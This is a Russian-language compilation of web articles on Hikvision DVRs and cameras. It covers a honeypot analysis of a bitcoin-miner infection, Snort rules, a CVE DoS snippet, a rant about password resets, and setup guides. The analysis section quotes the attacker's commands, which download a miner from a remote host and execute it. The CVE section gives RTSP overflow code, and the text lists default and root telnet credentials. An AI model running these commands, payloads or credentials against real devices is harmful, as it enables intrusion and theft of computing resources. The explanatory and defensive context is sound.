Hikvision пароль по умолчанию видеорегистратор


Взлом регистраторов и IP-камер Hikvision. Часть 2

 

"Крадуны процессорной мощности"

Необходимо пояснить, что скрипты и вирусы, работающие по площадям, могут рассказать очень многое о том, что именно они ищут. Один из инструментов толкового эксперта - т.н. ханипот (англ. honeypot - горшочек с мёдом). Эксперт подсовывает в сеть незащищенный компьютер или устройство, и внимательно смотрит куда лезет вредный скрипт, что он закачивает, что скачивает, где ещё гадит и как мимикрирует.

В прошлом году, Иоганн Ульрих из института безопастности САНС заинтересовался одной необычной штукой. Нечто лазило по сети и целенаправленно ломилось в 23 порт (телнета) со стандартными логином-паролем для Хиквижновских регистраторов и камер (root-12345). Получив доступ, пытались выполниться явно нестандартные действия. Заинтригованный, Ульрих побёг в ближайший лабаз и разжился новеньким испанским регистратором S04 (украинский аналог - DS-7104HWI-SH). После включения в сеть, на 23 порт тут же начала тыкаться прорва разного. Со стандартной парой root-12345 пролезло шестеро. Пять полазили по файловой системе и отвалились до лучших времён. Шестой повёл себя наглее.

Дальше техническое, не все поймут.

На регистраторе нет функции "закачать", нет wget'а и подобных вещей. Они с мясом вырезаны составителями прошивки (очень урезанный busybox).

Залогинившийся скрипт незатейливо передал простое сообщение:

"echo -ne

'\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00

 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00

 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00

 \x00\x31\x00\x00\x00\x00\x00

 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00

 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm

 && echo -e '\x64\x6f\x6e\x65'"

 Первая команда echo передавала 51 байт информации в новый файл "/var/run/rand0-btcminer-arm" и вторая эха передавала "done". Несмотря на название - это на сам майнер, а только его загрузчик, некая разновидность wget'а. Далее он используется для загрузки собственно майнера.

./rand0-btcminer-arm http://айпиадрес/btcminer-arm

&& chmod u+x btcminer-arm

&& ./btcminer-arm -B -o stratum+tcp://другой_адрес:3333 -t 4 -q

&& echo -ne '\x64\x6f\x6e\x65'

 

Этим wget'ом качается собственно сам майнер (btcminer-arm), ему ставятся разрешения на исполнение (chmod u+x), итд. В конце опять завершающий "done".

Для непричастных - о биткоинах.

Некие граждане в интернете изобрели то, что они называют "криптовалютой". Эта валюта представляет собой группы чисел, подчиняющиеся определённому алгоритму. Добывается ("майнится", от англ. mine - шахта) подобная валюта с помощью процессорных вычислений. Для этих целей лучше всего подходят видеокарты - они делают эти вычисления быстрее и многопоточнее процессоров. Процессоры тоже конечно могут, но сильно хуже и медленнее.

Интересующимся следует гуглить по словам "биткоины", "майнинг" и "криптовалюты". Как понятно из названия загружаемой программы - это биткоин (btc) майнер (miner) для процессоров арм (arm). Эффективность подобного майнинга сомнительна. Но, руководствуясь извечными принципами "на шару и уксус сладкий" и "пять старушек уже рупь" - регистраторы с заводскими паролями были массово поставлены под ружьё и пыжились аж до перегорающих процессоров - чтобы заработать некоему дяде по пять копеек в неделю.

Позже с Ульрихом связались крадуны с одноразового аккаунта твиттер и в подтверждение своей важности даже подкинули ему кусок кода, которым перебиралась прорва адресов и заражались регистраторы.

Сам код не представляет особого интереса - это обычный питоновский скрипт с подключенной телнетовской библиотекой (telnetlib), который тыкает в 23 порт пару root-12345 и ждет ответа, далее проверяет регистратор ли это и сохраняет слепок файловой системы.

Интерес представляет то, что регистратор впоследствии заражался еще несколько раз, и последующие установленные майнеры вполне себе мирно сосуществовали вместе, занимаясь групповым изнасилованием стонающего АРМ процессорчика.

Ульрих обращает внимание что большинство майнеров предпочитают порт 3333.

Также, если у кого есть линукс - можете попробовать простые консольные команды:

 

# detect if we do have an exposed DVR in our network

alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "DVR Login Prompt"; sid: 1100001; content: "|0a|dvrdvs login: "; flow: from_server, establishe\

d;)

# detect "banner" returned by busybox. Removed detailed version information

alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "Successful BusyBox Telnet Login"; sid: 1100002; content: "BusyBox v"; content: "built-in shel\

l (ash)"; within: 60; flow: from_server, established;)

# specific "Subscribe" request used by this miner. May need to be a bit more generic. E.g. keep port at "any" ?

alert TCP $HOME_NET any -> $EXTERNAL_NET 3333 (msg: "bitcoin miner subscribe request"; sid: 1100003; content: "{\"id\": 1, \"method\": \"mining.\

subscribe\", \"params\"";)

Можно отметить, что регистраторы Hikvision были атакованы просто как самые распространённые. Подобные атаки жадных майнеров уже терпят роутеры Asus, nas'ы Synology и другие популярные бытовые устройства с открытым по умолчанию телнетом.

Серьёзные взломы и уязвимости

Безопастники из конторы Рапид7 протестировали регистратор 7204-HVI-SV (прошивка V2.2.10 build 131009). В их официальном отчёте сделан вывод о уязвимости переполнения буфера для этого и похожих регистраторов. Навскидку минимум 150 тысяч уязвимых устройств.

Были представлены следующие ошибки:

CVE-2014-4878 involves exploiting a buffer overflow in the RTSP request body handling

CVE-2014-4879 involves exploiting a buffer overflow in the RTSP request header handling

CVE-2014-4880 involves exploiting a buffer overflow in the RTSP request basic authentication handling.

Как гласит отчёт, при особым образом сформированном RTSP запросе, мы получаем ошибку переполнения буфера, а вследствие и контроь над системой. Для этого неважно какой сложности был пароль.

Хендлер RTSP запроса использует буфер фиксированной ширины (2048 байт). Следующий код вызывает Denial-of-Service:

request =  "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST

request += "CSeq: 7\r\n"

request += "Authorization: Basic AAAAAAA\r\n"

request += "Content-length: 3200\r\n\r\n"

request += "A"*3200

Коды вызова DoS для остальных ошибок выглядят похожим образом.

Для непричастных стоит пояснить, что получая контроль над системой - хакер получит не просто всю информацию с камеры или регистратора, но еще и удобную точку входа в локальную сеть (где может поживиться уже вещами поинтерестнее). Контора у Рапид7 ответственная, производитель был оповещён за пару недель до публикации уязвимости и успел все исправить.

Выводы

Популяризация регистраторов и камер фирмы Хиквижн, мировая слава, изобилие однотипных устройств - совокупность этих факторов неизбежно повышает риск быть взломанным. Это был лишь вопрос времени.

В целом, если держать рекомендованную производителем прошивку и придумать хитрый пароль - подавляющему большинству пользователей ничего не угрожает.

Компания Хиквижн стала подходить строжее к вопросом парольной безопасности - по изменению пароля теперь явно указывается его слабость. Просят обычно создавать цифробуквенный, ну и тд.

К тому же на всех новых моделях регистраторов и камер (начиная с прошивки 5.3 уже) будет по умолчанию закрыт телнет. Телнет кстати запирают не только поэтому. Некоторые граждане повадились покупать в китайских интернет магазинах камеры Hikvision предназначенные для внутреннего китайского рынка - что характерно, очень недорого. Потом путем шаманских плясок, телнета и гайда в интернете залоченный китайский аппарат начинал казать на вполне приличном английском. Подробнее эту тему мы раскроем в следующих статьях.

hikvision.org.ua

Методика сброса пароля для оборудования Hikvision

Начиная с 2015 года действует следующая методика сброса пароля для видеорегистраторов и IP-камер видеонаблюдения Hikvision.

При первом включении оборудования HIKVSION, будь то IP камера видеонаблюдения или видеорегистратор пользователю необходимо активировать устройство, установив пароль (IPC и PTZ версия прошивки V5.3.0, Netra DVR/NVR версия прошивки V3.3.0, Turbo-HD видеорегистратор версия прошивки V3.1.6). Пароль по умолчанию не поддерживается. Стратегия сброса пароля для устройств, которые были активированы отличается от старой стратегии сброса пароля по серийному номеру.

Ниже приведено краткое руководство по сбросу пароля:

1. Через служебную программу SADP (поставляется на диске с камерой или регистратором или скачивается с официального сайта производителя)

a. Необходимо сначала выбрать устройство в SADP, на котором требуется сбросить пароль и нажать кнопку '''Export", затем выбрать любое место на компьютере и нажать кнопку ''Choose''. В выбранном месте появиться файл''DeviceKey.xml''.

b. Отправить файл ''DeviceKey.xml'' технической поддержке HIKVISION.

c. Техническая поддержка HIKVISION отправит Вам файл ''Encrypt.xml''.

d. Необходимо файл ''Encrypt.xml'' загрузить в SADP, ввести новый пароль и подтверждение ароля и после нажать кнопку"Импорт". Таким образом пароль будет сброшен.

Примечание:

a. Процедура сброса пароля действительна 2 дня, то есть файл''Encrypt.xml'' после 2-х дней будет бесполезным;

b. Устройство не должно перегружаться в течение всей продцедуры сброса пароля.

c. Программа SADP начиная с версии V2.2.3.5 build 150408 поддерживает данный вид сброса, более старые версии не поддерживают.

d. В данный момент SADP поддерживает сброс пароля только в пределах локальной

2. Через локальное меню

В локальном интерфейсе NVR/DVR, пользователь может сбросить пароль дважды щелкнув левой кнопкой мыши в нижнем левом углу в окне входа. После чего будет показан серийный номер устройства и ввод Secure code для сбросапароля. Данный вариант сброса пароля такой-же как и в старой стратегии, тоесть необходимо серийный номер видеорегистратора и текущее время на видеорегистраторе отправить в техническую поддержку HIKVISION. Техническая поддержка HIKVISION отправит Вам Secure code для сброса.

NVR/DVR окно входа (двойное нажатие в левом нижнем углу)

a. Окно ввода Secure code - надо просто ввести secure code и нажать OK

b. Новый пароль для активации - необходимо ввести новый пароль и подтверждение пароля.

Если вы приобрели данное оборудование в интернет-магазине Hd-master и столкнулись с необходимостью сбросить пароль который вы забыли - присылайте файл DeviceKey.xml нам - мы проверим факт приобретения устройства у нас и поможем вам со сбросом. Если оборудование было приобретено в другом месте - чтобы сбросить пароль, пожалуйста, свяжитесь с продавцом!

HD камеры по доступной цене

Качество изображения современных систем видеонаблюдения непрерывно растёт, а цена HD видеонаблюдения снижается. В 2015 г самый бюджетный сегмент рынка систем видеонаблюдения заняли камеры форматов HDCVI, HD-TVI и AHD с разрешением HD и Full HD ценой от 500 до 1000 гр. При этом разрешающая способность данных камер, характеризующая способность передавать чёткую картинку без помех, превышает данный параметр старых аналоговых камер в 4–6 раз. Новые форматы видеонаблюдения используют для передачи сигнала ТВ кабель или витую пару UTP, что делает возможным переход с аналоговых систем стандартного разрешения на системы HD и Full HD без дорогостоящих работ по замене линий связи. Несмотря на разнообразие форматов, самостоятельно построить систему видеонаблюдения не сложно.

Многоканальные видеорегистраторы

Для записи видео полученного от камер видеонаблюдения используются видеорегистраторы. Современные регистраторы обладают возможностью записи цифрового видео с разрешением от 2 Мп (Full HD) в бюджетном сегменте и до 12 Мп, перекрывая разрешающую способность 4К камер видеонаблюдения. Для небольших систем HD видеонаблюдения широкое распространение получили 4-х, 8-ми, и 16-ти канальные видеорегистраторы. Более дорогие модели работают с количеством камер до 64 и выше, оснащены функциями видеоанализа, могут вмещать до 8-ми HDD. Все модели многоканальных видеорегистраторов имеют возможность работы с различными облачными сервисами, упрощающими процесс настройки просмотра через интернет.

hdmaster.com.ua

HIKvision — сброс пароля и BIG FUCKING SECURITY FAIL

Сегодня я расскажу про одну анально огороженную вдупель тивоизированную кривую железку, от визита в офис разработчиков которой с канистрой особо жгучего алюминий-органического напалма и ржавым топором меня удержала лишь удалённость китайской компании ну и совсем немного — сложность и опасность изготовления такого напалма в кустарных условиях =).

ПРЕДУПЕРЖДЕНИЕ: если у вас аллергия на крепкие ругательства — вам читать дальше категорически нельзя. Аллергия закончится для вас анафилактическим шоком.Сегодняшний клиент нашей анатомички — IP-камера HIK-Vision DS-2CD2012-I. Это уличная камера для IP-видеонаблюдения. Настроена она была у клиента изрядное время назад, и вот недавно к ней пропал доступ. Попробовав как стандартные для этой камеры admin / 12345, так и свои ранее поставленные настройки, обнаружил, что пароли не подходят. То ли камеру хакнули (что бывает при наличии уязвимостей в прошивке), то ли она сама сглючила (тоже случается).

Тривиальная на первый взгляд задача сброса настроек на камере превратилась в адов квест.

Сперва выяснилось, что кнопка [RESET] на жопе камеры делает всё что угодно, но только не сброс камеры. Некоторые камеры хик-вижена сбрасываются включением камеры с зажатым на 20 секунд ресетом, но в моём случае это не помогло. Запустив пингование устройства, я просто нажал эту кнопку. Пинг не прервался. Девайс на неё вообще не реагирует !

Я конечно понимаю, что камера уличная и работала в Южном Бутово, но класс защиты IP66 и отчётливый звук щелчка кагбе намекал мне, что сама кнопка исправна.

Дело запахло общением с саппортом. Идём на hikvision.ru/support и созерцаем там прямо под контактными телефонами ссылку на инструкцию по сбросу пароля.

В «Контактах», блять!!!

По ссылке читаем полнейшую жесть — оказывается, сбросить пароль самому на ней нельзя (без паяльника и программатора, во всяком случае).

Для сброса надо иметь машинку с виндовс, находящуюся в том же Ethernet-сегменте, поставить туда кривую блядскую китайскую хуань под нзванием SADP.exe, с её помощью опросить девайс, узнать время её загрузки и серийный номер.

Эти две строчки надо отправить емейлом саппорту, и там они сгенерируют временный код для сброса пароля. Камеру ребутить всё это время нельзя — сменится BootTime, который используется при генерации кода сброса пароля.

Получается следующий анальный нагиб:

— имея доступ к локальной сети, любой хер может тривиально узнать серийник и время загрузки, после чего сбросить пароль на вашем же устройстве, написав в поддержку.— при наличии багов (а я 100% уверен, что они там есть) любой ксакеп тоже может без проблем поиметь доступ к камере.— Законный владелец просто так НЕ МОЖЕТ САМ СБРОСИТЬ НАСТРОЙКИ, даже ИМЕЯ ЛОКАЛЬНЫЙ ДОСТУП.

Это — полный, лютый, беспросветный пиздец. Такое вот «подобие безопасности в кавычках».

Сказать, что я от такого подхода полнейше фалломорфировал — это ничего не сказать!

Ситуация, когда пароль на устройстве может сбросить хуй знает кто, а владелец устройства вынужден писать какие-то серийники в поддержку для тривиальнейшего действия — она не просто ненормальна — она чудовищна! Давайте, скажите мне после этого, что Столлман излишне параноидален — я сильно посмеюсь с вашей тупой наивности.

При этом для обновления прошивки и корректной работы веб-интерфейса надо поставить в системе некие «Web-Components» для осла. Вопрос о процентном содержании китайских троянов в таких приблудах остаётся открытым. Компоненты далеко не безглючны. Например, вот так выводится LiveVideo на главной странице веб-морды камеры через этот ебучий ActiveX:

Искажнённое видео перекрывает верхнее меню, доставляя много неудобств в настройке.Сам процесс обновления прошивки тоже кривой сракой завязан на ActiveX и без него не начинается:

Однако если внимательно посмотреть, можно увидеть, что воспроизведение видео возможно не только через кривые компоненты и говно-плагины типа квик-тайма, но и через стандартнейший MJPEG, выбрав который, наше видео начинает прекрасно работать. Не знаю, есть ли в камере недокументированные шпионские функции от товарища Мао, но если есть — не удержусь от того, чтобы показать один известный в американской культуре жест средним пальцем:

Продолжаем забег. Погуглив про эти говнодевайсы, выяснилось, что это типичное анально тивоизированное устройство, для некоторых версий которого можно даже залогиниться телнетом с реквизитами root / hiklinux. Увы, но в моём случае это не помогло. Похоже, это даже пытались сделать платной услугой — такой вот вендор-лок по-китайски.

На ютубе есть даже обучающий видос с типа мануалом:

Охерев окончательно, я таки позвонил в саппорт. Оказалось, что идея такой анальной процедуры сброса пароля принадлежит китайским разработчикам, и МЕНЯТЬ ЕЁ ОНИ НЕ СОБИРАЮТСЯ!!

Также выяснилось, что письма с запросом на сброс пароля проходят ПРЕМОДЕРАЦИЮ (видимо, скрипты таки их заспамили), и ответа нужно подождать минут 10-15. Реально ничего не было отвечено в течении трёх часов, а первое письмо вообще не дошло.

В новой версии прошивки 5.2 сброс пароля теперь делается отправкой кривого файлика, выгруженного из утилиты SADP, а не отправкой серийника. Причина в том, что для старых прошивок есть онлайн-генератор этих самых кодов сброса:

https://www.ipcamtalk.com/hik-pw-reset.php

Позволяющий легко генерить коды сброса кому угодно! Единственное ограничение — нужно быть в той же L2-сети. Но это называть в 2015-м «защитой» — просто смешно.

Я решил прикола ради посмотреть, как идёт обмен при опросе камеры кривой тулзой SDAP.exe.Сперва тулза шлёт два UDP-пакета мультикастом на 239.255.255.250, порт 37020 (совершенно одинаковых).Внутри — XML-блок:

<?xml version="1.0" encoding="utf-8"?> <Probe> <Uuid>DCABB193-058C-45D1-AC55-1E6D0ECF85AC</Uuid> <Types>inquiry</Types> </Probe>

Да, вот прямо вот такой вот XML внутри UDP внутри IP-Multicast.

Затем тулза шлёт два совсем уж неведомых фрейма — в них неведомая бинарная херь упакована сразу в L2-Ethernet, без всякой L3/L4-инкапсуляции. В L2-заголовке тип пейлоада — не VLAN и не IP, а неведомая фигня 0x8033

Ну и напоследок камера отвечает в том же духе — одним-единственным пакетом,где бинарные данные обёрнуты сразу в L2-Ethernet. Хорошо хоть не броадкастом гавкает на весь влан, ибо внутри данных версия прошивки и серийники (напоминаю, по ним пароль сбрасывается!!) идут открытым текстом.

Сказать, что я был злой — это не сказать ничего. Мне очень давно не попадалось устройств подобной степени говнистости. К сожалению, я не записал дамп траффика, которым делается резет пароля — но предположу, что там примерно такая же херота.

Поскольку возможность сброса камеры зависит от компании-производителя (вот зондищще-то), то на многих удалённых от цивилизации объектах сброс подобной камеры может оказаться невозможен. Так что если у хиквижена на сайте на баннере написано «выбор профессианалофф» — не верьте, пиздят. Выбор профессионалов — это Axis, а не всякая неведомая поебень с бэкдорами и неработающим ресетом.

Понравилось это:

Нравится Загрузка...

Похожее

aminux.wordpress.com

Сброс пароля Hikvision -

 

Для начала установите самую свежую версию ПО SADP по ссылке

После открытия SADP программа просканирует вашу локальную сеть и отобразит список найденных камер.

После этого необходимо установить флажок напротив камеры, пароль которой должен быть сброшен и нажать на ссылку «Forgot Password»

 

Иллюстрация 1: Окно SADP после запуска

После нажатия на ссылку «Forgot Password» откроется окно, вид которого зависит от версии прошивки установленной в устройстве

Иллюстрация 2: Если прошивка: камеры 5.2.0 и ниже; регистратора 3.0.9 и нижеИллюстрация 3:  Если прошивка: камеры 5.3.0 и выше; регистратора 3.0.10 и выше

Если прошивка: камеры 5.2.0 и ниже; регистратора 3.0.9 и ниже

В этом случае вам необходимо получить «Security Code». Для этого, вам необходимо отправить на почту [email protected]:

  • полный серийный номер камеры (Например: DS­72xxABCDXY/SN123456789ABCD123456789ABCD)
  • Значение поля «Start time» (Например: 2014­05­22 1:11 PM), которое можно найти в правой части табицы

Так же можно просто установить флажок напротив необходимых устройств и нажать клавишу Export, полученный файл электронной таблицы отправить на почту [email protected]

В ответном письме вам будет направлен Security code для устройства

Если прошивка: камеры 5.3.0 и выше; регистратора 3.0.10 и выше

В данном случае вам необходимо нажать клавишу «Export», и выбрать папку для

сохранения специального файла (Например: DS­2CD2042WD­I20150818BBWRХХХХХХХХХ201511130935.xml )

Данный файл необходимо отправить на почту [email protected]

В ответном письме будет содержаться файл сброса (Например: 20151113021208.xml)

НЕ ПЕРЕЗАГРУЖАЙТЕ УСТРОЙСТВО ПОСЛЕ ОТПРАВКИ ДАННЫХ

Файл сброса и код сброса действуют только в течение двух суток настройки и архив устройства не изменятся

Возможные проблемы

SADP не находит камеру

Если утилита SADP не видит устройства, то перейдите по ссылке:  https://www.winpcap.org/

Загрузите и установите сетевой сканер winpcap, после этого перезагрузите компьютер и попробуйте снова открыть SADP, после этого, он должен начать корректно искать все устройства

Если все устройства обнаруживаются нормально, но не видно только конкретную, тут либо проблемы с подключением, либо с прошивкой камеры. Рекомендуется перепрошить устройство с помощью TFTP

При экспорте xml-файла для отправки появляется окно «Get key Error»

Попробуйте:

  • Переустановить ПО;
  • Отключить антивирусное ПО и фаерволлы;
  • Перезагрузить устройство;
  • Перезагрузить ПК;
  • Выключить ПК и устройство от сети. Подождать 2-3 минуты и затем включить их.

Если данные шаги не помогают, попробуйте повторить операцию на другом ПК

outvision.com.ua

Подключение и настройка ip камер Hikvision

Здесь вы сможете ознакомиться с подробной инструкцией с фото и видео иллюстрациями для самостоятельного подключения, настройки и установки ip камер Hikvision

 

Способы подачи питания к ip камере

Большинство ip камер видеонаблюдения поддерживают два стандарта питания: 12В и РоЕ

Стабилизированное напряжение 12 В.

Можно использовать блок питания.

Здесь просто ведем два кабеля: для питания и сигнальный (UTP).

 

Однако, проще использовать для подачи питания и данных к ip камере один кабель.

Для таких случаев можно применить РоЕ сплиттеры, которые объединяют питание и данные и позволяют провести всего один UTP кабель между камерой и блоком питания.

 

Так же можно использовать разъем с клемной колодкой для блоков питания. В таком варианте используем свободные жилы сетевого кабеля для питания, а оставшиеся обжимаем в коннектор по которым будет идти данные.

В следствии того, что в этом варианте необходимо зачищать оплетку жилы, и если нет знания как правильно это делать, то есть большая вероятность надреза жилы и её последующего излома.  

 

Технология PoE (стандарт передачи питания и данных по одному сетевому кабелю). К примеру РоЕ инжектор.

Имеет два выхода RJ 45.Первый - данные (Data) подключаем к сети, в нашем случае напрямую к роутеруПо второму порту идет питание и данные (Data&Power) к камере по одному сетевому кабелю.Таким образом, используя технологию PoE, минимизируется количество соединений, что повышает надежность системы.

 

Активация ip камеры Hikvision

При использовании устройств Hikvision в первый раз, пользователю необходимо активировать устройство путем принудительной установки пароля.

Это можно сделать 4-я способами:

- через утилиту SADP (в комплекте поставки)- через Веб браузер - через клиента iVMS-4200 (в комплекте поставки)- активировать камеры посредством видеорегистратора.

 Как наиболее простой и надежный способ активации камеры, советую использовать программу SADP, скачать можно здесь.

Если вы все правильно подключили, то в программе появиться список всех устройств Hikvision

Выбрать устройство, которое нужно активировать в списке ''Онлайн устройств'';- Установить новый пароль в поле ''Device Activation'';- Подтвердить новый пароль;- Нажать на кнопку [OK], чтобы активировать устройство.

Вместе с тем, в этой утилите можно задать/изменить подходящий для вашей сети ip адрес, шлюз, маску подсети

 

 

Активация через Веб браузер:

В адресную строку Internet Explorer набираем ip адрес камеры в адресную строку Internet Explorer (по умолчанию 192.168.1.64). - Установите ваш пароль в первое поле; - Подтвердите пароль во втором поле; - Нажмите [OK], чтобы активировать устройство.

Активация через клиента iVMS-4200.

Во вкладке "Device Management" выбираем ip камеру, которую необходимо активировать, - нажимаем Activate, в открывшемся окне  задаем пароль и подтверждаем его.

Активация камеры посредством видеорегистратора

Существует четыре способа:

- Добавление в одно касание: В интерфейсе устройства видерегистратора, пользователи могут использовать "добавление в одно касание", чтобы добавить все камеры в локальной сети. Все добавленные камеры будут автоматически активированы с паролем как на видеорегистраторе;

- Активация в одно касание: В интерфейсе устройства видерегистратора, пользователи могут активировать все камеры в локальной сети с использованием само-определенным паролем или с присваиванием пароля от видеорегистратора.

- Ручное добавление: Добавить вручную одну камеру с присваиванием пароля от видеорегистратора.

- Plug & Play: Подключить камеру к видеорегистратору через PoE интерфейс с присваиванием пароля от видеорегистратора.

 

Настройка ip камеры Hikvision

На видео настройка основных параметров ip камеры Hikvision DS-2CD2420F-IW с версией прошивки 5.4.3 в web интерфейсе браузера mozilla

На этом видео настройка основных параметров ip камеры Hikvision DS-2CD2420F-I с предыдущим версиями прошивки в web интерфейсе браузера internet explorer

 

Подключение и Настройка ip камеры Hikvision к облачному сервису EZVIZ

EZVIZ — бесплатный облачный Р2Р сервис для просмотра видеонаблюдения через интернет.Облачный клиент даёт возможность удаленно подключаться к вашим камерам и видеорегистраторам Hikvision без статического ip адреса

Подробнее о том, как настроить Р2Р клиента, читайте в статье - Как настроить подключение ip камер Hikvision к EZVIZ

 

Как сбросить пароль с ip камеры Hikvision

Выключить питание камеры. Нажать и удерживать кнопку RESET. Подать питание на камеру. Через 20 секунд отпустить кнопку. Сброс произведен.

Или в web интерфейсе камеры в меню насройки - вкладка обслуживание - нажать по умолчанию. Камера будет сброшена до заводских настроек.

 

Как правильно установить ip камеру Hikvision

Для монтажа камер были использованы следующие материалы:

- Коробка распределительная о/п 85х85х40, 6 вых., IP44- Металлорукав герметичный в ПВХ изоляции Ø 16- Коннектор TWT-PL45-8P8C RJ45, 8P8C, кат.5e- Кабель UTP, 4 пары, категория 5e

 

 

Скачать ПО и прошивки можно здесь

xn--80acbicddaug4avfh8v.xn--90ais

SADP программа для изменения настроек IP-камер Hikvision, мануал, скачать

Итак у вас есть IP-камера фирмы Hikvision. Вы сделали все монтажные работы и теперь вам нужно запустить вашу систему видеонаблюдения.

Начинаем с того, что вводим IP адрес указанный в документации на IP камеру. По умолчанию для всех IP камер Hikvision применяется следующие данные для доступа:

  • IP адрес — 192.0.0.64
  • логин — admin
  • пароль — 12345

Однако не все так просто, введя адрес, используемый Hikvision по умолчанию  вы получите милое сообщение «Веб-страница недоступна».

Дело в том, что ваш коммутатор работает с другим диапазоном адресов. Но их ни в коем случае менять не нужно. Изменения вносим совсем в другом месте, а именно на компьютере. Заходим в центр управления сетями и общим доступом Windows и выбираем пункт — подключение по локальной сети.

Выбираем кнопку сведения.

На открывшейся вкладке смотрим шлюз по умолчанию.

Из этого окна видим, что компьютер работает в сети — 192.168.0.*. IP адрес,  камеры Hikvision, как помним — 192.0.0.64. Теперь нужно изменить IP адрес используемый по умолчанию на 192.168.0.64.

Для этого нужна программа от Hikvision под названием SADP. Скачать можно с официального сайта Hikvision по ссылке.

После запуска программа найдёт имеющиеся в сети IP камеры Hikvision. На рисунке видно, как это происходит.

И теперь в правой колонке следует указать необходимый IP адрес и Gateway, а также перед нажатием кнопки Save в ввести пароль — 12345. Пароль этот можно впоследствии поменять в веб-интерфейсе IP-камеры.

Теперь после ввода нового IP-адреса появится изображение с IP камеры.

Таким образом IP камеры подключаются к компьютеру.

Еще проще подключить IP камеру к видеорегистратору. Ниже мы приводим видео, как это сделать.

Ниже мы приводим более подробную инструкцию по работе с программой SADP.

Для правильной работы этой программы необходимо установить WinPcap. Это набор библиотек для Windows, позволяющий приложениям получать доступ к сетевым пакетам, находящихся в стеке, минуя высшие подсети.

1. Поиск активных устройств. После запуска программы, SADP автоматически сканирует локальную сеть в поисках вновь подключенных устройств, которые затем отображаются в главном окне программы. Список недавно подключенных устройств, обновляется каждые 15 сек, а список отключенных устройств, обновляется каждые 45 сек. Вы также можете вручную обновить список с помощью кнопки «Refresh» для немедленного обновления информации об имеющихся в сети устройствах. В главном окне программы отображается основная информация о параметрах сети, таких как: тип устройства, IP-адрес, порты, маска, MAC адрес, и т. д. Доступны также дополнительные сведения, такие как версия прошивки, название и серийный номер устройства и информация об активации устройства. Все эти сведения могут быть сохранены после нажатия на кнопку «Save as excel» в файле с расширением .xls. С помощью программы очень просто, вы можете перейти к окну входа в систему. При двойном щелчке на выбранном устройстве, происходит автоматическое перенаправление на страницу входа в систему через веб-браузер.2. Активация устройства с помощью SADP. При первом подключении регистратора (с версией прошивки выше V3.3.0) или камеры (с версией прошивки выше V5.3.0) к сети, устройства обнаруживаются программой SADP или регистратор как неактивный (Inactive). Это связано с дополнительной безопасностью, внесенными компанией Hikvision для затруднения несанкционированного доступа. Чтобы активировать устройство, необходимо установить новый пароль для пользователя «admin». Это можно сделать с помощью веб-браузера при первом входе в систему, с помощью программы SADP или с помощью регистратора. Чтобы активировать устройство с помощью программы SADP необходимо:
  •     Выбрать устройство в SADP (вы можете также выбрать несколько устройств для одновременной активации и придания им того же пароля),
  •     Ввести новый пароль для устройства и подтвердите кнопкой «ОК».

Вид окна программы SADP в котором красным цветом выделена область для ввода нового пароля и активации устройства.

Программа автоматически проверяет и показывает силу введенного пароля. Надежный пароль должен содержать от 8 до 16 символов, среди которых должны быть, по крайней мере, три вида из следующих символов: цифры, строчные буквы, заглавные буквы, специальные символы.

3. Изменение параметров сети устройства.Чтобы изменить параметры сети одного устройства, необходимо:

  •     Выбрать в списке устройство, параметры которого в сети будут изменены (список доступных для изменения сетевых параметров отображается в правой части программы). Если функция DHCP включена, можно изменить только некоторые параметры, такие как:  Порт SDK (по умолчанию 8000) и HTTP Порт (по умолчанию 80). Остальные параметры сети (например, IP-адрес, маска, шлюз), назначаются автоматически через DHCP-сервер. В случае использования адресации IPv6, она должна поддерживаться устройством. Так же, как в случае функции DHCP, который должен поддерживаться как устройством, так и маршрутизатором в сети к которой они подключены.
  •     Если DHCP не работает, возможно ручное изменение всех доступных параметров сети (например, IP-адрес, маска, шлюз, и т. д.),
  •     Чтобы все настройки были сохранены, необходимо ввести пароль для доступа к камере и подтвердите его кнопкой Save.
Вид окна программы SADP. Красным цветом выделена область настройки сетевых параметров для выбранного устройства, при выключенной функции DHCP.Существует также возможность изменения сетевых параметров нескольких устройств одновременно. Для этого необходимо:
  •     Нажмите на одно устройство и перетащите с помощью мыши для выделения последовательных параметров, которые будут доступны для редактирования в правой части окна настройки необходимо ввести начальный IP-адрес (например, если будут выбраны три устройства и начальный адрес будет 192.168.1.64, устройства последовательно будут выдаваться адреса 192.168.1.65, 192.168.1.66)
  •     Вы также можете выбрать функцию «Enable DHCP in Batch» для автоматического присвоения выделенным устройствам таких сетевых параметров, как IP-адрес, маска, шлюз,
  •   Для сохранения всех настроек необходимо ввести пароль доступа для устройств и подтвердите его кнопкой «Save».

Вид окна программы SADP. Красным цветом выделена область, в которой при активных опциях есть возможность присвоения сетевых параметров для группы устройств.

4. Восстановление пароля по умолчанию.В случае возникновения проблем, связанных с доступом к камере или dvr, вызванных неправильным паролем, есть возможность сбросить его до заводских настроек. Компания Hikvision предоставляет два способа восстановления пароля, установленного по умолчанию в зависимости от версии прошивки (с версией прошивки выше V3.3.0 в регистраторах. и выше V5.3.0 в камерах, предоставляется способ второй).Первый способ:Необходимо выбрать в главном окне программы SADP устройство, пароль которого хотим восстановить заводские настройки. Если окно восстановления пароля будет выглядеть как на следующем рисунке, следует выполнить следующие шаги:

  •      выбрать устройство,
  •     скопировать из программы SADP с закладки «Start Time» дата и время » и с закладки «Device Serial NO: серийный номер устройства
  •     Отправить информацию в службу технической поддержки [email protected]
  •   В течение 1-2 рабочих дней, вам будет выслан код разблокировки,
  • Выбрать устройство, которое мы хотим разблокировать,
  • Полученный защитный код необходимо вставить в окно «Security Code» и подтвердить кнопкой ОК,
  • Пароль доступа к устройству будет сброшен к заводским настройкам (логин: admin, пароль: 12345)
В окне программы SADP. Красным цветом выделена область, в которой необходимо ввести полученный код для восстановления заводских настроек.Способ второй: Необходимо выбрать в главном окне программы SADP устройство, пароль которого хотим восстановить. Если окно настройки будет выглядеть так, как показано на следующем рисунке, следует выполнить следующие шаги:
  • Выбрать устройство,
  • Во вкладке рядом с кнопкой Export, следует указать место, в котором будет сохранен файл, позволяющий восстановить пароль (следует выбрать папку в которой будет расположен экспортированный файл с именем DeviceKey.xml)
  • Нажмите кнопку «Export»
  •  Затем файл необходимо отправить в службу технической поддержки [email protected] В течение 1-2 рабочих дня будет выслан файл разблокировки пароля,
